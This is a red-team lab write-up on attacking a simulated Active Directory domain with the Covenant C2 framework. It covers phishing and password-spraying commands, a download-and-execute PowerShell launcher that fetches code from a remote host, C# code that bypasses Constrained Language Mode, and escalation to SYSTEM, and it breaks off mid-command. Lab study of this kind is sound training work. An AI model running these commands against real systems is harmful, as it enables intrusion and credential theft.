# Red-teamsing Active Directory Lab #1 (Covenant C2)

- [Red-teamsing Active Directory Lab #1 (Covenant C2)](#red-teamsing-active-directory-lab-1-covenant-c2)
  - [Introduction](#introduction)
    - [Tools](#tools)
  - [Reference Section - Initial Recon](#reference-section---initial-recon)
  - [Reference Section - Designing a phishing scenario](#reference-section---designing-a-phishing-scenario)
  - [Setting up Covenant](#setting-up-covenant)
  - [Initial Access](#initial-access)
  - [AMSI bypass](#amsi-bypass)
  - [Elevation from administrator to System](#elevation-from-administrator-to-system)
  - [PsExec](#psexec)

---

## Introduction

There is no strict definition of "Red Teaming" however its general purpose is to simulate a real-world threat to an organization. The primary goal is to show the potential impact, not to obtain maximum privileges - this is not a CTF competition.

The impact can be shown by e.g. demonstrating access to sensitive data and critical servers or the ability to alter information and process flows within the organization.

The result of the exercise should be recommendations to the audited company on:

- How to handle incidents like the tested scenarios
- How to better detect intrusion attempts

In red team engagements traditional reverse shells are no longer used their role has been taken by complex C2 (Command & Control) frameworks that are able to receive and maintain hundreds of concurrent "shells".

Moreover, physical access, however still practiced, is often not needed. Traditional red teaming often starts with a physical engagement which ends up in planting a hardware backdoor (or simply a laptop) inside the target organization. In the context of this red team lab, we will focus on a scenario where access to the target organization is achieved remotely e.g. via phishing or password spraying. This is often the way attackers gain access to organizations.

A potential C2 infrastructure can look similar to the below image:

![picture 78](images/31acae1e0bb0d94543cb363a2c13c76e783b5efe3b7f45709998cdead5f89433.png)  

A C2 infrastructure may consist of:

- A SMTP Server - which will be used to distribute phishing emails
- A Payload server - which will be used to serve any files that will be downloaded to victim devices
- Implants (Agents) - basically the reverse shells which are created in a standardized, C2-compatible format. Usually C2 frameworks allow to create compatible implants in the same way as you can create msfvenom payloads using the Metasploit framework.
- Redirectors - servers that act as a proxy between the victim and the back-end infrastructure. Implants will connect to redirectors and will have their traffic passed further to the back-end, while any non-implant originating traffic will be dropped, effectively protecting the back-end infrastructure from potential investigation or counter-attack attempts.
- Network traffic has to be crafted in a way that it will not be easily distinguished from legitimate HTTP traffic. This means that implants should communicate over HTTPS which can be easily disguised as legitimate web browsing. For additional security any communication can be asynchronous or use techniques like domain fronting.
- The backend C2 server is the heart of whole operations. Here all implants can be managed and the operator can manage all the controlled devices within target organization.

<br/>

Reference - [Red Team infrastructure Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)

<br/>

Popular C2 frameworks:

- [Cobalt strike (commercial)](https://www.cobaltstrike.com/) 
- [Metasploit (free and commercial)](https://www.metasploit.com/)
- [Covenant (Open source)](https://github.com/cobbr/Covenant) 
- [SharpC2 (Open source)](https://github.com/SharpC2/SharpC2) 
- [SilentTrinity (Open source)](https://github.com/byt3bl33d3r/SILENTTRINITY)
- [Faction (Open source)](https://www.factionc2.com/)
- [Koadic (Open source)](https://github.com/zerosum0x0/koadic)
- [Resurrected PowerShell Empire (Open source)](https://github.com/BC-SECURITY/Empire)

<br/>

In the context of this lab we will use Covenant (written in .NET), however you are free to use the C2 framework of your choosing.

In the following scenario we will try to operate as if we were performing an internal red team assessment against a real target (ELS.LOCAL). During this lab we will perform thorough reconnaissance/enumeration activities, obtain initial foothold into the target organization, and then try to extend our foothold by identifying all possible attack paths and misconfigurations.

During the tests, which you are encouraged to follow along, we will use two Virtual Machines a Windows 10 and a Kali Linux 2019.4. For more information about the used setup please refer to Tools Used part above.


### Tools

- Covenant v0.4
- Kali 2019/4
- PowerView
- Mimikatz
- Visual Studio 2017 with MS Build 15
- Socat for Windows

---

## Reference Section - Initial Recon

This lab simulates an internal red teaming engagement. That being said let's be reminded of the initial reconnaissance steps that we should take during external engagements. In the beginning of an external red teaming engagement, prior to any attack-related activities, we should carefully analyze the attack surface of the targeted organization. Numerous OSINT techniques can help us figure out if there are any exploitable weaknesses on the external perimeter of the targeted organization.

We can use our Kali machine in order to perform some basic checks against a target company. To be on the safe side, use any company that is running a bug bounty program, for example, Google.

If we wanted to target google.com, first thing we need to check in a red team assessment is if we have permission to attack that website. Although real attackers will not care about this, we are still on the "ethical" side of hacking. We should thus always operate taking into consideration any legal restrictions.

If a website is hosted by a third-party provider or leverages shared hosting (which the case on smaller companies), we must not target such an asset. Start by issuing the following commands:

```bash
dig google.com +short
who is <IP>
```

![picture 79](images/f8e64e3041e03bd4988e39d0f8563c5c2852bc1f37660502d8b531c386a4e88f.png)  

<br/>

We can see that the above IP address is within a range owned by Google, so this could be a valid target.

You should perform such a verification against any domain you are about to assess.

Attacking the exposed or a well-known subdomain of a target organization is like charging at the front door. It is very likely that any application that is frequently used and/or is well-known to external users is thoroughly secured and monitored. As an attacker, you would like to identify less obvious entry points, like forgotten external-facing dev servers or rarely used web applications.

One of the ways to do this could be performing subdomain enumeration. If you are lucky, you might also be able to find a misconfigured DNS server which is vulnerable to Zone Transfer - and obtain all the subdomains it is capable of resolving.

For example, you might want to use [dnscan](https://github.com/rbsec/dnscan) which will allow to identify subdomains through a brute-force approach (using a wordlist) or through an attempted zone transfer. See an example below.

![picture 80](images/bf164f11d056001e7790f240949a9d5b1f07316dfef81d816f42e27a1dce2cff.png)  

<br/>

Another tool you might be interested in is `amass`. **Amass** performs complex reconnaissance against subdomains. It has multiple advanced options that you can explore. On a Kali machine you should be able to get and use **Amass** as follows.

```sh
sudo apt-get install amass
amass enum -active -d google.com -v -o google.com
```

![picture 81](images/17dd8821de8d755fdb8011e311e00b2cd44c84cb16781be31a542798d619ab0e.png)  

![picture 82](images/04dcff2811f40f86644bc10be6e483319e0bda85fa4e44df81e7cce8df103438.png)  


<br/>

As Google is a very large organization, this could produce a huge list of results. Even for smaller organizations you will still be able to get quite some information. Each subdomain can be potential entry point to the target.

!!! note

    Even stealthier (and passive) subdomain enumeration can be achieved by analyzing SSL certificates. [https://censys.io/](https://censys.io/) collects such data.

<br/>

---

## Reference Section - Designing a phishing scenario

The first rule of successful phishing is to convince your target that the mail he/she is opening is coming from a legitimate source. You should take for granted that in mature organizations, security awareness training has taken place. This means that people may check the sender domain (however, only few will do so).

In an ideal scenario you may encounter a misconfigured corporate e-mail server. [Spoofcheck](https://github.com/BishopFox/spoofcheck) is a very handy tool that can help you check if a domain can be spoofed from.

If you have problems running `spoofcheck`, you should use `python2`. On Kali, type:

```
pip2 install -r requirements.txt
python2 spoofcheck.py
```

![picture 83](images/10a14400e152f04f8ba98848db5f03a0a5c569941b4c6bf144cf013aa2c4a55f.png)  

<br/>

In other cases, you may want to try using **homoglyphs** or alter the letters' order in your phishing domain name. Say you want to pretend you are sending an email from `targetcompany.com`. You can try to register domain (and set up a mail server) like `targetcopmany.com` or `targetcompany.biz` (or whatever tld is available and looks convincing).

After setting up a convincing e-mail, you will also need to seek your victims. Spear-phishing is so successful only because it uses a strong pretext behind the scenario - which can only be achieved through proper OSINT.

For example, you want to send an e-mail **only to a certain department of the targeted company**. In order to achieve that, LinkedIn might be a very helpful source of information. Through a source like LinkedIn you can search for a certain company and identify all employees linked to it. Based on their public posts you may be able to figure out what projects they are currently working on or what currently matters for them the most. This can be a priceless addition to your social engineering scenario.

Another factor that will add reliability to your attack is gathering and then leveraging valid credentials after performing an initial breach. Such credentials may allow you to authenticate to a corporate e-mail server which may be vulnerable to relaying or you can simply send an e-mail as the person whose credentials you possess (be careful though, since there is high likelihood that someone will go back to your victim personally and ask for an email they did not sent).

As already covered in the course, another way of identifying valid credentials is password spraying. **Password spraying** requires an authentication endpoint (like an Outlook Web Application or Lync endpoint) and a large list of valid logins (preferably logins used in corporate SSO) in order to try a small number of popular or guessable passwords against a large amount of accounts. A helpful tool for that can be [Spraying ToolKit](https://github.com/byt3bl33d3r/SprayingToolkit).

Using SprayingToolkit, you may be able to conduct a successful password spraying attack against an OWA (Outlook Web Application) Endpoint using `atomizer.py`.

```bash
./atomizer.py owa targetowaserver.example.com February2020 /root/Desktop/users.txt
```

<br/>

This way, account lockout might be avoided. However, security-savvy companies may be monitoring such attempts.

[Mailsniper](https://github.com/dafthack/MailSniper) is another effective password spraying tool, using which one can easily conduct a password spraying attack against OWA or Exchange servers.

The last method to obtain credentials is through phishing portals. It is fairly easy to craft a spoofed Google login page. The real art is to create it in a way that will allow for actual logging into the "Real" service behind without the victim noticing.

Custom scripts can always be developed to do that but tools like [Modlishka](https://github.com/drk1wi/Modlishka) or [Evilginx2](https://github.com/kgretzky/evilginx2) have already been developed to facilitate such attacks.

Setting up evilginx will require you to set up your own domain. Among the advantages of using this tool is a pre-configured set of phishing templates named phishlets, which are compatible with evilnginx. This allows for quickly setting up an effective phishing campaign.

It is about time we set up a C2 that will handle incoming connections. For the time being, let's build a simple infrastructure on top of our two aforementioned Virtual Machines. In a real-life scenario you would possibly like to have a more complex infrastructure, like the one we already mentioned in the beginning of this document.

<br/>

---

## Setting up Covenant

```
sudo apt update -y && sudo apt-get install -y dotnet-sdk-3.1
git clone --recurse-submodules https://github.com/cobbr/Covenant 
cd Covenant/Covenant 
dotnet run
```

![picture 84](images/1c856ac54f38b2233b619d2faaeac73c498870aa3a1dbb90553163ae4cca53f5.png)  

Navigate to [Covenant](https://127.0.0.1:7443) and create the admin user.

- Admin / P@ssw0rd

<br/>

Let's create a Listener on tcp/80:

![picture 85](images/de01dae1c05ecc31fb081bf16617e7fe989f12822b3a140fe0eaa8274c3cd5c5.png)  

![picture 86](images/c48606a41289378aae4a195ed1f3c44f17cc0112f45af8a9120e943cf1b1ade5.png)  

<br/>

Now, for each listener you need to create a Launcher. 

Launcher is the implant "loader" associated with its parent listener, and upon being run on a Windows system it will connect back to the listener it is associated with. 

Note that Covenant offers plenty of launchers. Moreover, each launcher can be wrapped in your own custom dropper that fits the constraints of the targeted environment best. Proper recon, enumeration and OSINT can help you choose the best launcher for each scenario and any technical constraints of the targeted environment.

Let's use **PowerShell Launcher**:

![picture 87](images/e0056440ddf33c58fdbb737a5d54102dc777173e00d618b8b184f507e69885cd.png)  

![picture 88](images/2c7acbb9de4b381e2b5e03656a587ea1efcb420f77d7b6c88255e1c6add6fb44.png)  

- Leave all as default

After clicking `Generate`, we can see the Launcher and the Encoded Launcher:

![picture 89](images/91344694f2fb5f43f1f1adeebf5a1cf8d177a5dc83ca239e854574585e080f1e.png)  

<br/>

Then go to the `Host` tab and inset a URL under which the payload will be hosted. Then click `Host`:

![picture 90](images/3a4b0cb52e618fc29503b6cb2994f80415746fc1af8f611c9affe89559ffbd05.png)  

<br/>

![picture 91](images/ea94a322cbed0ff39c2cb0ad2d01cef71d003454d17dec84877d330c01e16647.png)  

- The Launcher URL changes accordingly

<br/>

---

## Initial Access

Our first goal is to compromise the webserver `win10-web`.  We can try password spraying again the exposed RDP service.

Let perform a recon:

```
nmap -sC -T4 -Pn -p1-65535 10.100.10.240 -v
```

![picture 92](images/4999a20bb1788c40f782c5c3e7c5b747a877850afe67a27da8a2570646139e67.png)  

<br/>

We can use the [script](../../../ecptx/scripts/rdpspray.sh) to test perform password spray:

```bash
echo "10.100.10.240:65520" > hosts.txt
echo "victim" > users.txt
bash rdpspray.sh -l "users.txt" -d "ELS-CHILD" -p "Summer2020!" -v "hosts.txt"
```

![picture 95](images/c19b201217f3fbb17fc692dfd372fe0d848fff4403c32675aede9e21b4afefb6.png)  


<br/>

Then we can use `xfreerdp` to get in:

```bash
xfreerdp /v:10.100.10.240:65520 /d:ELS-CHILD /u:victim /p:Summer2020! /sec:nla /cert-ignore
```

![picture 96](images/c69034243283a27c3933ac6f1d8158a6cf2efcceabc88e28674dd355f6660a44.png)  

<br/>

Launch **PowerShell** and execute the Launcher command:

```powershell
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString('http://175.12.80.13/1.ps1')
```

![picture 97](images/261709922cd6063c4405f3ae421d6591c699b44d3cadbb9c27b0fad6a1605940.png)  

- Look like it is in constrained language mode

This can be shown using `dir env:`:

![picture 98](images/d62848f6197d72f34aeb0f5fdf58cc4bd56dcc59939391b098669a120e42378e.png)  

- `4` = Constrained Language Mode

<br/>

On Kali:

```
cat >> CLMBypass.cs <<EOF
// compile it with CSC
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /r:"System.Management.Automation.dll" CLMBypass.cs
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace CLMBypass
{
    class Program
    {
        static void Main(string[] args)
        {
            String cmd = args[0];
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
        }
    }
}
EOF
python3 -m http.server 443
```

On the Windows machine, run PowerShell as admin:

```
wget http://175.12.80.13:443/CLMBypass.cs -o CLMBypass.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /r:"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" CLMBypass.cs
.\CLMBypass.exe "iex (New-Object Net.WebClient).DownloadString('http://175.12.80.13/1.ps1')"
```

![picture 99](images/1e5bf47304b99f5384bd5477c727d091187b8d4ca98368f9e0879c40c71ec593.png)  

<br/>

Get a callback GruntHTTP:

![[picture 100](images/e7475c0ab9757c5403d6620e5fb8df5b943bee926bec22d8e56ec18588fdef3c.png)](images/e7475c0ab9757c5403d6620e5fb8df5b943bee926bec22d8e56ec18588fdef3c.png)

<br/>

---

## AMSI bypass

To play around with AMSI - first enable it.

If you see `Your Virus & Threat Protection Is Managed By Your Organization`, run the following in an elevated `cmd.exe`:

```powershell
net user ELSAdmin P@ssw0rd
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
shutdown /r /t 0
```

<br/>

After reboot, the RealtimeProtection should be enabled.

<br/>

Lab fails

<br/>

---

## Elevation from administrator to System

First use the module `ProcessList` to list the process and find out the process with SYSTEM privilege:


![picture 101](images/51b39438df0b856db1deaa55213249460ae48bacca9aa63365535b3fbc3e0fe9.png)  

Then use `ImpersonateProcess /processsid:"4152"` and `WhoAmI`:

![picture 102](images/4237b03d4b1df45ef45f56d3aa646e910e4aed20a562a23a4bbfc8d5c55c63fd.png)  

<br/>

Then we can get a Grunt with a SYSTEM privilege:

![picture 103](images/2b76102972331ae404d6833d9c382a21060dffef3d2f16b0e4725618e731b9c5.png)  

![picture 104](images/547fa58bb854b97adbeabd30a2c3277a03aae199c3d47db008989385e10476a8.png)  


---

## PsExec

Alternatively, since we've got the credentials `victim / Summer2020!`, we can use `psexec.py` to get a SYSTEM shell:

```
psexec.py 